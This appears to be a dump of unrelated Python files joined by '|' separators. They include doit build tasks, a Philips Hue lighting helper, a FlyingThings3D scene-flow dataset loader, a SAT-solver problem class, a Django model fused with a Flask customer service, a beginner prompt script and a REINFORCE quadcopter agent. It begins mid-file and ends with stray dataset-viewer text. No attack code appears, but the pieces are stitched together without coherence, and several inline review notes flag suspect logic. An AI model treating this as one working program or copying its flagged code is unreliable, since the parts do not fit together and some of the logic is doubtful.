    cmd = ['pyinstaller', os.path.join('pack', 'avame.spec'), '--clean', '-y']
    return {'actions': [cmd]}
def task_pack_tui():
    # Bundle the TUI application with PyInstaller from its spec file.
    cmd = ['pyinstaller', os.path.join('pack', 'avame-tui.spec'), '--clean', '-y']
    return {'actions': [cmd]}
def task_make_dmg():
    # Build the macOS disk image using the dmgbuild settings script.
    cmd = ['dmgbuild', '-s', os.path.join('pack', 'dmg_settings.py'), 'EAvatar ME', 'dist/avame.dmg']
    return {'actions': [cmd], 'verbosity': 2}
def task_unit_test():
    # Unit tests with fresh coverage collection over src/ava.
    cmd = ['py.test', '-s', '--cov', os.path.join('src', 'ava'), '-vvv',
           os.path.join('tests', 'unit')]
    return {'actions': [cmd], 'verbosity': 2}
def task_int_test():
    # Integration tests, appending to the coverage data from unit tests.
    cmd = ['py.test', '-s', '--cov-append', '--cov', os.path.join('src', 'ava'),
           '-vvv', os.path.join('tests', 'integration')]
    return {'actions': [cmd], 'verbosity': 2}
def task_func_test():
    # Functional tests run without coverage collection.
    cmd = ['py.test', '-s', '-vvv', os.path.join('tests', 'functional')]
    return {'actions': [cmd], 'verbosity': 2}
def task_all_tests():
    # Lint, then unit (fresh coverage), integration (appended coverage)
    # and functional tests, in that order.
    cov_path = os.path.join('src', 'ava')
    return {
        'actions': [
            ['flake8', 'src/ava'],
            ['py.test', '-s', '--cov', cov_path, '-vvv', os.path.join('tests', 'unit')],
            ['py.test', '-s', '--cov-append', '--cov', cov_path, '-vvv', os.path.join('tests', 'integration')],
            ['py.test', '-s', '-vvv', os.path.join('tests', 'functional')]
        ],
        'verbosity': 2
    }
def task_start_agent():
    # Launch the TUI shell with PYTHONPATH covering the repo root and src/.
    # Platform check inlined (same test is_windows() performs).
    if sys.platform.startswith('win'):
        os.environ['PYTHONPATH'] = '.;.\\src'
    else:
        os.environ['PYTHONPATH'] = '.:./src'
    return {
        'actions': [['python', os.path.join('src', 'avashell', 'shell_tui.py')]],
        'verbosity': 2
    }
def task_flake8_check():
    # Style-check the package sources with flake8.
    return {'actions': [['flake8', 'src/ava']], 'verbosity': 2}
def task_pylint_check():
    # Run pylint static analysis over the package sources.
    return {'actions': [['pylint', 'src/ava']], 'verbosity': 2}
|
from qhue import Bridge
import math
from pathlib import Path
def getHueInfo():
    # Read the bridge IP and API user id from the hard-coded config file.
    # Expected format: two "label: value" lines — bridge first, user second.
    # NOTE(review): the absolute Windows path makes this non-portable.
    filePath = Path("C:\\homeAutomation\\categories\\lighting\\hueInfo.txt")
    f = open(filePath, "r")
    data = f.readlines()
    f.close()
    #info = data.split(",")
    bridgeInfo = data[0].split(":")
    userInfo = data[1].split(":")
    bridgeIP = bridgeInfo[1].strip("\n").strip()
    userID = userInfo[1].strip("\n").strip()
    return bridgeIP, userID
def getBridge():
    '''Returns a bridge object and the number of light groups'''
    # NOTE(review): groupNums is actually the group *ids* (dict keys view),
    # not a count, despite the docstring wording.
    bridgeIP, userID = getHueInfo()
    b = Bridge(bridgeIP, userID)
    groupNums = b.groups().keys()
    return (b, groupNums)
def convertBrightLevel(brightPercentage):
    '''Converts a percentage (0-100) to a Hue brightness level (0-255)'''
    # Same arithmetic order as before (fraction first, then scale) so the
    # floating-point rounding — and therefore the result — is identical.
    fraction = brightPercentage / 100
    return math.ceil(fraction * 255)
def lightsOnOff(bridge, groupNums, state):
    '''Turns the lights in every listed group on (state=True) or off'''
    for groupId in groupNums:
        bridge.groups[groupId].action(on=state)
def setBrightness(bridge, groupNums, sliderValue):
    '''Sets the brightness of a light group from a 0-100 slider value'''
    brightLevel = convertBrightLevel(sliderValue)
    # Level 0 means "off"; any other level switches the lights on first
    # and then applies the brightness.
    lightsOnOff(bridge, groupNums, brightLevel != 0)
    if brightLevel == 0:
        return
    for groupId in groupNums:
        bridge.groups[groupId].action(bri=brightLevel)
def setColor(bridge, groupNums, colorValue):
    '''Sets the colour temperature (ct) of every listed light group'''
    for groupId in groupNums:
        bridge.groups[groupId].action(ct=colorValue)
def getCurrentColor(bridge, groupNums):
    '''Returns the current color value'''
    # Each iteration overwrites the previous value, so this reports the
    # colour of the LAST group id (original behaviour preserved);
    # an empty groupNums yields "".
    currentColor = ""
    for groupId in groupNums:
        currentColor = bridge.groups[groupId]()['action']['ct']
    return currentColor
def getCurrentBrightness(bridge, groupNums):
    '''Returns the current brightness value'''
    # Reports the brightness of the LAST group id in groupNums
    # (original behaviour preserved); an empty groupNums yields "".
    currentBri = ""
    for groupId in groupNums:
        currentBri = bridge.groups[groupId]()['action']['bri']
    return currentBri
|
import sys, os
import os.path as osp
import numpy as np
import torch.utils.data as data
__all__ = ['FlyingThings3DSubset']
class FlyingThings3DSubset(data.Dataset):
    """
    Point-cloud scene-flow dataset over preprocessed FlyingThings3D_subset.

    Args:
        train (bool): If True, creates dataset from training set, otherwise creates from test set.
        transform (callable): applied to [pc1, pc2]; expected to return
            (pc1_transformed, pc2_transformed, sf_transformed).
        num_points (int): nominal points per cloud (used for reporting here).
        data_root (str): directory containing 'FlyingThings3D_subset_processed_35m'.
        overfit_samples (int, optional): restrict to the first N samples
            (forces the 'val' split regardless of *train*).
        full (bool): when False, keep only every 4th sample.
    """
    def __init__(self,
                 train,
                 transform,
                 num_points,
                 data_root,
                 overfit_samples=None,
                 full=True):
        self.root = osp.join(data_root, 'FlyingThings3D_subset_processed_35m')
        self.train = train
        self.transform = transform
        self.num_points = num_points
        self.samples = self.make_dataset(full, overfit_samples)
        if len(self.samples) == 0:
            raise (RuntimeError("Found 0 files in subfolders of: " + self.root + "\n"))
    def __len__(self):
        return len(self.samples)
    def __getitem__(self, index):
        # Load and transform the pair; if the transform rejects the sample
        # (returns None for pc1), retry with a uniformly random index.
        pc1_loaded, pc2_loaded = self.pc_loader(self.samples[index])
        pc1_transformed, pc2_transformed, sf_transformed = self.transform([pc1_loaded, pc2_loaded])
        if pc1_transformed is None:
            print('path {} get pc1 is None'.format(self.samples[index]), flush=True)
            index = np.random.choice(range(self.__len__()))
            return self.__getitem__(index)
        # "norm" outputs are plain aliases of the transformed clouds here —
        # no separate normalisation is computed.
        pc1_norm = pc1_transformed
        pc2_norm = pc2_transformed
        return pc1_transformed, pc2_transformed, pc1_norm, pc2_norm, sf_transformed, self.samples[index]
    def __repr__(self):
        # Human-readable summary used by print(dataset).
        fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
        fmt_str += '    Number of datapoints: {}\n'.format(self.__len__())
        fmt_str += '    Number of points per point cloud: {}\n'.format(self.num_points)
        fmt_str += '    is training: {}\n'.format(self.train)
        fmt_str += '    Root Location: {}\n'.format(self.root)
        tmp = '    Transforms (if any): '
        fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
        return fmt_str
    def make_dataset(self, full, overfit_samples):
        # Collect the leaf directories (no subdirectories) under the chosen
        # split as samples; overfit_samples forces the 'val' split.
        root = osp.realpath(osp.expanduser(self.root))
        root = osp.join(root, 'train') if (self.train and overfit_samples is None) else osp.join(root, 'val')
        print(root)
        all_paths = os.walk(root)
        useful_paths = sorted([item[0] for item in all_paths if len(item[1]) == 0])
        try:
            # Hard-coded sizes of the expected official train/val splits;
            # a mismatch aborts the process.
            if (self.train and overfit_samples is None):
                assert (len(useful_paths) == 19640)
            else:
                assert (len(useful_paths) == 3824)
        except AssertionError:
            print('len(useful_paths) =', len(useful_paths))
            sys.exit(1)
        if overfit_samples is not None:
            res_paths = useful_paths[:overfit_samples]
        else:
            if not full:
                res_paths = useful_paths[::4]
            else:
                res_paths = useful_paths
        return res_paths
    def pc_loader(self, path):
        """
        Args:
            path: path to a dir, e.g., home/xiuye/share/data/Driving_processed/35mm_focallength/scene_forwards/slow/0791
        Returns:
            pc1: ndarray (N, 3) np.float32
            pc2: ndarray (N, 3) np.float32
        """
        pc1 = np.load(osp.join(path, 'pc1.npy'))
        pc2 = np.load(osp.join(path, 'pc2.npy'))
        # multiply -1 only for subset datasets
        # (flips the first and last coordinate axes of both clouds;
        # presumably converts the subset's coordinate convention — confirm
        # against the preprocessing pipeline)
        pc1[..., -1] *= -1
        pc2[..., -1] *= -1
        pc1[..., 0] *= -1
        pc2[..., 0] *= -1
        return pc1, pc2
|
from collections import defaultdict
from contextlib import contextmanager
from variable import Variable, Assignments
def evaluable(clause, assignment):
    """Return True when every variable in *clause* has a (non-None) assignment."""
    return all(assignment[literal.name] is not None for literal in clause)
def istautology(clause):
    """Return True when *clause* holds some variable in both polarities (x OR NOT x)."""
    seen_polarity = {}
    for literal in clause:
        # Record the first polarity seen; a later opposite polarity is a tautology.
        first = seen_polarity.setdefault(literal.name, literal.ispositive)
        if first != literal.ispositive:
            return True
    return False
class Problem:
    """A CNF SAT problem: a mutable clause list plus a checkpoint/undo stack.

    Clauses removed by simplification steps (tautology removal, unit
    propagation) are pushed onto the current checkpoint frame so they can be
    re-appended when the checkpoint is rolled back.
    """
    def __init__(self, problem):
        # problem: list of clauses; each clause is an iterable of Variable literals.
        self.problem = problem
        # Stack of frames; each frame lists clauses removed since its checkpoint.
        self.modification_stack = [[]]
        # Guards against deriving assignments from the same problem twice
        # (attribute keeps the original spelling "initalized").
        self.initalized = False

    @contextmanager
    def checkpoint(self):
        """Context manager: on exit (even on exception), restore clauses removed inside."""
        try:
            self.create_checkpoint()
            yield
        finally:
            self.restore_checkpoint()

    def create_checkpoint(self):
        # Open a new undo frame.
        self.modification_stack.append([])

    def restore_checkpoint(self):
        # Re-append every clause removed since the last checkpoint, then drop the frame.
        for clause in self.modification_stack[-1]:
            self.problem.append(clause)
        del self.modification_stack[-1]

    def initialise_assignments_from_rules(self):
        """Return a fresh Assignments mapping every variable name to None (unassigned).

        Raises ValueError on a second call for the same Problem instance.
        """
        rules = self.problem
        if not self.initalized:
            self.initalized = True
            assignments = Assignments()
            for clause in rules:
                for variable in clause:
                    assignments[variable.name] = None
            return assignments
        else:
            raise ValueError('Assignments based on this problem were already initialized. Are you sure you want to do this?')

    def satisfied(self, assignments):
        """Return True when every clause has at least one literal evaluating to True."""
        problem = self.problem
        for clause in problem:
            flag = False
            for variable in clause:
                assignment = assignments[variable.name]
                if variable.evaluate(assignment) is True:
                    flag = True
                    break
            if not flag:
                return False
        return True

    def still_satisfiable(self, assignment):
        """Return False only if some fully-assigned clause is already unsatisfied.

        Clauses with unassigned variables are skipped — they may still become true.
        """
        problem = self.problem
        for clause in problem:
            flag = False
            if evaluable(clause, assignment):
                for variable in clause:
                    # A literal is satisfied when its polarity matches the assignment.
                    if variable.ispositive == assignment[variable.name]:
                        flag = True
                        break
                if not flag:
                    return False
        return True

    def remove_tautologies(self):
        """Drop tautological clauses (recording them for undo); return how many were removed."""
        problem = self.problem
        new_problem = []
        for clause in problem:
            if istautology(clause):
                # Record removal so restore_checkpoint() can bring the clause back.
                self.modification_stack[-1].append(clause)
            else:
                new_problem.append(clause)
        diff = len(problem) - len(new_problem)
        # Mutate in place so external references to the clause list stay valid.
        problem[:] = new_problem
        return diff

    def variables(self):
        """Yield every literal occurrence across all clauses (with repetition)."""
        problem = self.problem
        for clause in problem:
            for variable in clause:
                yield variable

    def get_pure_literals(self, assignments):
        """Return Variables that occur with only one polarity among unassigned names.

        NOTE(review): `variable.name not in assignments` relies on the project
        Assignments type's membership semantics (presumably "not yet assigned")
        — confirm against the Assignments implementation.
        """
        variables = defaultdict(set)
        for variable in self.variables():
            if variable.name not in assignments:
                variables[variable.name].add(variable.ispositive)
        return [
            Variable(name, ispositive.pop())
            for name, ispositive in variables.items()
            if len(ispositive) == 1
        ]

    def assign_pure_literals(self, assignments):
        """Assign every pure literal its polarity; return the number of assignments made."""
        pure_literals = self.get_pure_literals(assignments)
        modifications = len(pure_literals)
        for variable in pure_literals:
            assignments[variable.name] = variable.ispositive
        return modifications

    def assign_unit_clauses(self, assignments):
        """Unit propagation: assign clauses with exactly one unassigned literal.

        Returns the number of clauses removed from the problem.
        """
        problem = self.problem
        new_problem = []
        for clause in problem:
            count = 0
            for variable in clause:
                if assignments[variable.name] == variable.ispositive:
                    # This clause is True
                    count = 0
                    break
                elif assignments[variable.name] is None:
                    last_variable = variable
                    count += 1
            # NOTE(review): with count == 0 (already-satisfied clause) control
            # falls through the no-op below into the `else` branch, so satisfied
            # clauses are KEPT in the problem — confirm this is intended.
            if count == 0:
                pass
            if count == 1:
                # Unit variable, assign, and do not append
                assignments[last_variable.name] = last_variable.ispositive
                self.modification_stack[-1].append(clause)
            else:
                new_problem.append(clause)
        diff = len(problem) - len(new_problem)
        problem[:] = new_problem
        return diff

    def variables_with_clause_length(self):
        """Yield (literal, len(clause)) pairs for every literal occurrence."""
        problem = self.problem
        for clause in problem:
            for variable in clause:
                yield variable, len(clause)
|
from django.db import models
from django.conf import settings
# Create your models here.
class Post(models.Model):
    """A blog post with automatic created/updated timestamps and a view counter."""
    # Headline, capped at 240 characters.
    title = models.CharField(max_length=240)
    # Full post content.
    body = models.TextField()
    # Set once on insert (auto_now_add); never touched afterwards.
    created_at = models.DateTimeField(auto_now=False, auto_now_add=True)
    # Refreshed on every save (auto_now).
    updated_at = models.DateTimeField(auto_now=True, auto_now_add=False)
    # View counter. NOTE(review): default is 1 rather than 0 — presumably the
    # creation itself counts as a view; confirm intent.
    views = models.IntegerField(default=1)

    def __str__(self):
        # Admin/shell display uses the post title.
        return self.title
from app.main import db
from app.main.model.customer import Customer
def get_all_customers():
    """Return every Customer row as a list."""
    customer_query = Customer.query
    return customer_query.all()
def get_customers_by_lead(data):
    """Return a query of customers whose lead_id matches data['lead_id']."""
    lead_id = data["lead_id"]
    return Customer.query.filter_by(lead_id=lead_id)
def save_new_customer(lead):
    """Create a Customer from *lead*, persist it, and return (payload, 201)."""
    customer = Customer(lead)
    save_changes(customer)
    payload = {
        'method': 'save_new_customer',
        'status': 'success',
        'message': 'New customer successfully registered.'
    }
    return payload, 201
def delete_all_customers():
    """Delete every Customer row from the database.

    Fix: the original referenced the undefined name ``Customers`` (the model
    imported at the top of this module is ``Customer``), so this function
    always raised NameError. Also renamed the local ``all`` (it shadowed the
    builtin) and moved the commit out of the loop so the whole wipe happens
    in a single transaction.
    """
    customers = Customer.query.all()  # was: Customers.query.all() -> NameError
    for customer in customers:
        db.session.delete(customer)
    # One commit for the whole batch instead of one per row.
    db.session.commit()
def save_changes(data):
    """Stage *data* on the SQLAlchemy session and commit immediately."""
    session = db.session
    session.add(data)
    session.commit()
|
#ex14.py = Prompting and Passing
#https://learnpythonthehardway.org/book/ex14.html
#from sys import argv
#script, user_name = argv
#prompt = '>'
#print "Hi %s, I'm the %s script." % (user_name, script)
#print "I'd like to ask you a few questions."
#print "Do you like me %s?" % user_name
#likes = raw_input(prompt)
#print "Where do you live %s?" % user_name
#lives = raw_input(prompt)
#print "What kind of computer do you have?"
#computer = raw_input (prompt)
#print """
#Alright, so you said %r about liking me.
#You live in %r. Not sure where that is.
#And you have a %r computer. Nice.
#""" % (likes, lives, computer)
#HQSML-150831:Desktop kallis201$ python ex14.py Kate
#Hi Kate, I'm the ex14.py script.
#I'd like to ask you a few questions.
#Do you like me Kate?
#>Yes
#Where do you live Kate?
#>Philadelphia
#What kind of computer do you have?
#>Mac
#Alright, so you said 'Yes' about liking me.
#You live in 'Philadelphia'. Not sure where that is.
#And you have a 'Mac' computer. Nice.
#Zork! Adventure! I remember this.
#Try it out
# Variation on LPTHW ex14: greet the user named on the command line and echo
# their answers back. Python 2 script (print statements, raw_input).
from sys import argv
# Expects exactly one CLI argument: the user's name (argv[0] is the script path).
script, user_name = argv
prompt = '>'
# %s interpolates str(); the %r used in the summary below shows repr (with quotes).
print "Hi %s, I'm the %s awesome-o 5000 question asker." % (user_name, script)
print "I'd like to ask you a few questions."
print "Do you have any coffee %s?" % user_name
coffee = raw_input(prompt)  # Python 2 raw_input: read one line as a string
print "Are you wearing pants at work today, %s?" % user_name
pants = raw_input(prompt)
print "How many dragons do you have?"
dragons = raw_input (prompt)
print "Can I play with your pet dragons?"
play = raw_input (prompt)
# Multi-line summary; %r renders each answer with surrounding quotes.
print """
Alright, so you said %r about having coffee. I have no coffee. You should bring me some.
You said %r about pants wearing. Interesting.
And you have %r dragons. Nice. You said %r about playing with them. Rude.
You should have said 'Hell, yes'.
""" % (coffee, pants, dragons, play)
|
import numpy as np
import random
from collections import namedtuple, deque
import torch
torch.manual_seed(0) # set random seed
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Categorical
from agents.policy_search import PolicySearch_Agent
BUFFER_SIZE = int(1e6)  # replay buffer size
BATCH_SIZE = 64         # minibatch size
LR = 1e-2  # 5e-4       # learning rate (earlier run used 5e-4)
# Action-space mode switch: True = one shared network queried per rotor (state
# augmented with the actor id); False = one network over the exhaustive
# combination of per-rotor action levels. See PolicyNN_Agent docstring.
ACTION_ONE_ROTOR = False  # determines how actions are computed
# Run on the first GPU when available, otherwise CPU.
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Policy(nn.Module):
    """Two-layer MLP policy: state -> softmax distribution over discrete actions.

    Fixes: removed the leftover debug ``print`` in :meth:`act` (it spammed
    stdout on every sampled action) and deleted the commented-out dead code.
    Interface is unchanged.
    """

    def __init__(self, state_size, action_size, seed, fc1_units=64, fc2_units=64):
        """Initialize parameters and build model.

        Params
        ======
            state_size (int): Dimension of each state
            action_size (int): Dimension of each action
            seed (int): Random seed (currently unused; kept for interface
                compatibility — the original seeding line was commented out)
            fc1_units (int): Number of nodes in first hidden layer
            fc2_units (int): Unused by this two-layer network; kept for
                interface compatibility
        """
        super(Policy, self).__init__()
        self.fc1 = nn.Linear(state_size, fc1_units)
        self.fc2 = nn.Linear(fc1_units, action_size)

    def forward(self, x):
        """Map a batch of states to action probabilities (softmax over actions)."""
        x = F.relu(self.fc1(x))
        x = self.fc2(x)
        return F.softmax(x, dim=1)

    def act(self, state):
        """Sample an action for a single numpy *state*.

        Returns (action index as int, log-probability tensor for the sampled
        action) — the log-prob keeps the graph for REINFORCE updates.
        """
        state = torch.from_numpy(state).float().unsqueeze(0).to(device)
        probs = self.forward(state).cpu()
        m = Categorical(probs)
        action = m.sample()
        return action.item(), m.log_prob(action)
class PolicyNN_Agent(PolicySearch_Agent):
    """Custom agent for NN policy learning with derivations from policy search skeleton.
    Interacts with and learns from the environment (a task). During development, two modes
    were created for different action set definitions.
    **ACTION_ONE_ROTOR==True**
    This DQN agent creates a set of integer actions based on the length of `self.action_scalars`
    and uses a duplicated network set to generate the right number of action (according to task)
    outputs. This allows learning of a *single* model that shares some joint knowledge of
    how to choose actions for different actors.
    To track the specific actor, states in the memory buffer are augmented by one dimension
    to include the specific actor utilized.
    **ACTION_ONE_ROTOR==False**
    This DQN agent creates a set of integer actions based on the exhaustive combination of
    different action values for use in a single policy model. Specifically, it quantizes to derive
    the possible number of action values and replicates that for the total number of actors.
    To give each actor a full set of action values, an action space is created for each on/off
    permutation. For this reason, it's wise to keep *action_steps* rather low.
    """
    def __init__(self, task, seed=None, num_episodes=None, action_steps=4, reward_decay=1):
        """Initialize an Agent object.

        Params
        ======
            task (Task): task for environmnet definition
            seed (int): random seed
            num_episodes (int): used to derive gamma_decay when reward_decay is None
            action_steps (int): number of discrete magnitude levels per action
            reward_decay (float or None): fixed per-step gamma decay factor;
                None derives one from num_episodes
        """
        self.seed = random.seed(seed)  # random.seed returns None; kept for bookkeeping
        # auto-manage gamma (discount)
        self.gamma_start = 1.0
        self.gamma_end = 0.01
        # constant decay proportional to episodes (about 0.995 over 1000 episodes)
        if reward_decay is None:
            self.gamma_decay = 1 - 0.005*1000/num_episodes
        else:
            self.gamma_decay = reward_decay
        self.gamma_last = self.gamma_start
        super().__init__(task)
        self.action_rows = task.action_repeat
        # Action magnitude range from the task's low/high bounds.
        val_min = min(self.action_low, self.action_high)
        val_max = max(self.action_low, self.action_high)
        val_range = val_max - val_min
        # get number of discrete states (keep action size smaller)
        # NOTE(review): np.log here is the natural log while base=2, so the
        # endpoints are 2**ln(1)=1 and 2**(-ln(val_range)) — confirm this
        # produces the intended spread of magnitudes.
        self.action_scalars = np.logspace(np.log(1), -np.log(val_range),
                                          num=action_steps-1, base=2, endpoint=True) * val_range
        self.action_scalars = list(self.action_scalars) + [0]  # always include "off" (0)
        print("Action Gradients: {:}, Max: {:}".format(self.action_scalars, val_range))
        # policy network
        if ACTION_ONE_ROTOR:
            # One shared network; state is augmented with the actor id (+1 input).
            self.policy = Policy(self.state_size+1, len(self.action_scalars), seed).to(device)
        else:
            self.action_scalars_raw = self.action_scalars
            # in this mode, we compute exhaustive sclar array for action values
            # NOTE(review): for S levels and A actors the exhaustive count is
            # S**A; this computes action_size**len(scalars) (A**S) — verify.
            action_size_total = pow(self.action_size, len(self.action_scalars))
            # this will be the look-up array for actual values
            self.action_scalars = np.zeros((action_size_total, self.action_size))
            # now fill in the action values for each of the actions
            value_mask = len(self.action_scalars_raw) - 1
            for ii_action in range(action_size_total):
                action_value = ii_action # we'll keep shifting this one down
                for ii_actor in range(self.action_size):
                    lookup_idx = action_value & value_mask
                    #print(ii_action, ii_actor, action_value, value_mask, lookup_idx, self.action_scalars_raw[lookup_idx])
                    self.action_scalars[ii_action,ii_actor] = self.action_scalars_raw[lookup_idx]
                    # NOTE(review): shifting by len(raw) — a count, not a bit
                    # width — looks suspicious (4 levels need a 2-bit shift,
                    # not 4). Verify the index encoding round-trips.
                    action_value >>= len(self.action_scalars_raw)
            # formulate policy engine with larger scalar set
            self.policy = Policy(self.state_size, action_size_total, seed).to(device)
            print("Action Gradients: {:}, Max: {:}, Len: {:}".format(self.action_scalars, val_range, len(self.action_scalars)))
        self.optimizer = optim.Adam(self.policy.parameters(), lr=LR)
        # Replay memory
        self.memory = []
        self.policy_loss = None
        # save log prob each action
        self.log_prob_action = []

    def reset_episode(self, include_randomize=False):
        # Reset per-episode counters and the discount back to its start value.
        self.t_step = 0
        self.gamma_last = self.gamma_start
        self.memory = []
        self.error = 0
        return super().reset_episode(include_randomize)

    def peek_state(self):
        # for simplicity, just show final decision layer for action
        return (self.policy.fc2.weight)

    def _state_actor_stamp(self, state, actor_id):
        # Append the actor id to the state in one-network-per-rotor mode;
        # otherwise pass the state through unchanged.
        if ACTION_ONE_ROTOR:
            return np.concatenate((state, [actor_id]))
        return state

    def step(self, reward, done, action, state, next_state):
        """Record the REINFORCE loss terms for the actions taken this step."""
        super().step(reward, done, action, state, next_state)
        # decay gamma toward its floor (original comment: "curtail episolon")
        self.gamma_last = max(self.gamma_end, self.gamma_decay*self.gamma_last) # decrease gamma
        # loop through each action required for individual memory insertion
        for i_actor in range(len(self.log_prob_action)):
            # Policy-gradient term: -log_prob * discounted reward.
            self.memory.append(-self.log_prob_action[i_actor] * self.gamma_last * reward)
        self.policy_loss = torch.cat(self.memory).sum()

    def learn_update(self, best_update):
        """Backprop the accumulated policy loss and take one optimizer step."""
        #print("--- loss ---")
        #print(self.policy_loss)
        self.optimizer.zero_grad()
        self.policy_loss.backward()
        self.error = self.policy_loss.sum()
        self.optimizer.step()
        self.memory = []

    def act(self, state, eps=None):
        """Returns actions for given state as per current policy.

        Params
        ======
            state (array_like): current state
            eps (float): epsilon, for epsilon-greedy action selection (unused here)
        """
        # add specific actor to new state as we iterate over actors
        ret_act = [0] * self.action_size
        # One log-prob slot per actor in per-rotor mode; a single slot otherwise.
        if ACTION_ONE_ROTOR:
            self.log_prob_action = [0] * self.action_size
        else:
            self.log_prob_action = [0]
        # loop through each action required for individual memory insertion
        for i_actor in range(len(self.log_prob_action)):
            # augment the state to have each actor's identity
            state_actor = self._state_actor_stamp(state, i_actor)
            # retrieve action for this specific actor
            act_new, log_prob = self.actor_act(state_actor)
            # map to specific action
            if ACTION_ONE_ROTOR:
                # Scalar magnitude for this single rotor.
                ret_act[i_actor] = self.action_scalars[act_new]
            else:
                # Row lookup: one magnitude per rotor in a single shot.
                ret_act = self.action_scalars[act_new]
            self.log_prob_action[i_actor] = log_prob
        # print("---- act ----")
        # print(ret_act, self.gamma_last, self.error, self.task.state()['position'])
        return ret_act

    def actor_act(self, state, eps=None):
        """Returns actions for given state as per current policy.

        Params
        ======
            state (array_like): current state
            eps (float): epsilon, for epsilon-greedy action selection (unused here)
        """
        action, log_prob = self.policy.act(state)
        return action, log_prob
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.